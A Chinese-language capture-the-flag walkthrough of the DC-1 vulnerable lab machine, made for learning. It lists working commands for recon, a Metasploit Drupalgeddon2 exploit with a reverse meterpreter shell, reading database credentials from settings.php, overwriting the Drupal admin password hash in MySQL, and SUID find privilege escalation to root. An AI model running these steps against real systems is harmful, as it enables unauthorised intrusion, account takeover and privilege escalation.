《Vulhub-DC-1靶场实战》_vulhub的漏洞靶场实战

DC-1靶场通关教程

作者： susususuao
免责声明：本文仅供学习研究，严禁从事非法活动，任何后果由使用者本人负责。

一：前言

• DC-1 是一个专门建造的易受攻击的实验室，旨在获得渗透测试领域的经验。
• 它旨在为初学者带来挑战，但它的简单程度取决于您的技能和知识以及您的学习能力。
• 要成功完成这一挑战，您将需要 Linux 技能、熟悉 Linux 命令行以及使用基本渗透测试工具的经验，例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。
• 有多种获得 root 的方法，但是，我已经包含了一些包含初学者线索的标志。
• 总共有五个标志，但最终目标是在 root 的主目录中找到并读取标志。 您甚至不需要成为 root 即可执行此操作，但是，您将需要 root 权限。
• 根据您的技能水平，您可能可以跳过查找大多数这些标志并直接获取根。
• 初学者可能会遇到他们以前从未遇到过的挑战，但谷歌搜索应该是获取完成这一挑战所需信息的全部内容。

二：DC-1靶场搭建与环境部署

环境：

 虚拟机   ：VMware Workstation Pro 16
 网络模式 ：VMnet8（能够相互通信即可）
 DC-1    ：IP地址：192.168.5.142
 KALI    ：IP地址：192.168.5.133
1
2
3
4

下载:
VMware Workstation pro 16 点击下载
KALI 点击下载
DC-1 点击下载
(至2022/7.5)

部署DC-1：
1.导入虚拟机
2.配置网络确保能够通信

三：DC-1渗透教学

1. 信息收集

• 因为是局域网环境，所以就简单的对DC-1靶机ip、端口收集下

＃ arp-scan -l    //发送ARP包到任意多个目标主机，寻找局域网存活的主机
1

• 因为局域网存在主机较少，所以可以直接判断DC-1的ip

• 对DC-1靶机进行详细扫描

＃ nmap -sV -A -p- 192.168.5.142    //检测服务器开启的端口和版本号

-sV 版本检测 用于扫描目标主机服务版本号. 探测打开的端口以确定服务/版本信息
-A ip 综合扫描
1
2
3
4

• 可以发现开放了我们比较常见的ssh的22端口和http的80端口

• 看见80端口习惯性的去浏览器访问一下，看到有个登陆框，首先想过爆破或者sql注入，但是经本人测试没有成功（本人能力有限）

• 进行指纹识别(whatweb)

＃ whatweb -v 192.168.5.142    //指纹识别
1

可以看到CMS为Drupal 7 (http://drupal.org)。
接下来就好办了，就以Drupal进行渗透。

2.漏洞利用

1. 通过MSF进行渗透

＃ msfconsole    //进入
search Drupa   //查找相关Drupa漏洞模块
1
2

2. 经过测试发现exploit/unix/webapp/drupal_drupalgeddon2模块可以利用

use exploit/unix/webapp/drupal_drupalgeddon2  //进入该模块
show payloads    //查看有哪些payloads
1
2

3. 这里使用payload/php/meterpreter/reverse_tcp

set payload php/meterpreter/reverse_tcp  //使用该payload
show options            //查看需要的配置
1
2

4. yes是必填项，可以发现默认基本上给填好了，只需把RHOST（靶机IP）

set rhosts 192.168.5.142  //设置靶机IP地址
run     //运行
1
2

可以看到session的成功建立，接下来就开始flag的寻找。

4.FLAG挖掘

1. 首先拿到shell，在使用python进行反弹

shell  //获得shell
id     //测试下
python -c "import  pty;pty.spawn('/bin/bash')"    //通过python进行反弹
1
2
3

flag1

ls
cat flag1.txt
1
2

提示：每个好的CMS都需要一个配置文件——你也是。

flag2

• 根据提示寻找下配置文件
  不知道配置文件名，可以百度搜索一下
  

find . -name "sett*"   //通过find搜索名字sett开头的相关文件
1

• 直接cat

cat ./sites/default/settings.php
1

flag2给出的提示：

暴力和字典攻击不是

只有获得访问权限的方法（您将需要访问权限）。
你能用这些证书做什么？
同时还发现了mysql数据库账号密码

flag3

• 根据提示登陆数据库

mysql -udbuser -pR0ck3t
1

• 接下来查库（建议手巧）

show databases;   //查看数据库
use drupaldb;     //进入drupaldb库
1
2

show tables;   //查看里面的表
1

• 发现一个users表

select * from users\G;    //查看users表里内容

\G   将查到的结构旋转90度变成纵向
1
2
3

• 发现admin密码被加密了，根据$S可以大概的判断是hash加密，猜想里面可能存在加密的工具。

find . -name "*hash*"   //搜索有hash有相关的
1

• 经过探索发现是一个密码加密的的脚本，只需在脚本后面加上要加密的数。

./scripts/password-hash.sh 123456
1

• 得到123456的hash= $S$DpEkg8l1hOozcQUqw1rK.qpZ…CrV8b0jWOrfzoIA3z9Tmn/rDry

• 复制生成的hash密码进入数据库修改admin密码。

update users set pass='$S$DpEkg8l1hOozcQUqw1rK.qpZ..CrV8b0jWOrfzoIA3z9Tmn/rDry' where name="admin";

1
2

• 输入账号admin，密码123456
  
• 这里面发现了flag3的信息

• 进入后根据提示可以知道接下来去查看passwd,还需要提权。

flag4

cat /etc/passwd       //查看
1

• 发现有个flag4，且还获取它的存放路径/home/flag4，接下来进去查看。

cd /home/flag
ls
cat flag4.txt
1
2
3

• 获取到flag4的信息，接下来根据提示在根目录中查找或访问下一个标志

flag5

• 首先从/home/flag4返回到根目录，在去查看/roo。

cd ../../          //返回根目录
cd /root          //进入root目录
1
2

• 会发现权限不够进不去

• 接下来就提权，这里利用suid提权，查看默认root权限执行的程序。

find / -perm -u=s -type f 2>/dev/null     //查看执行的有哪些程序

find 指令
/ 根目录(查找位置)
-perm 权限
-u 用户(s=特权)
-type 类型
f 文件
2>/dev/nul 过滤错误信息(不显示错误信息)
1
2
3
4
5
6
7
8
9

• 发现有个find，接下来就使用find提权。

• 方法不唯一

find ./ aaa -exec '/bin/sh' \;
1

• 输入whoami查看是否是root用户

• 到/root目录下寻找最后的flag

cd /root
ls
cat thefinalflag.txt
1
2
3

四： 总结

1. NMAP进行主机发现后和信息收集
2. whatweb进行CMS指纹识别
3. MSF进行渗透
4. Mysql进行数据查看和修改
5. 通过find提权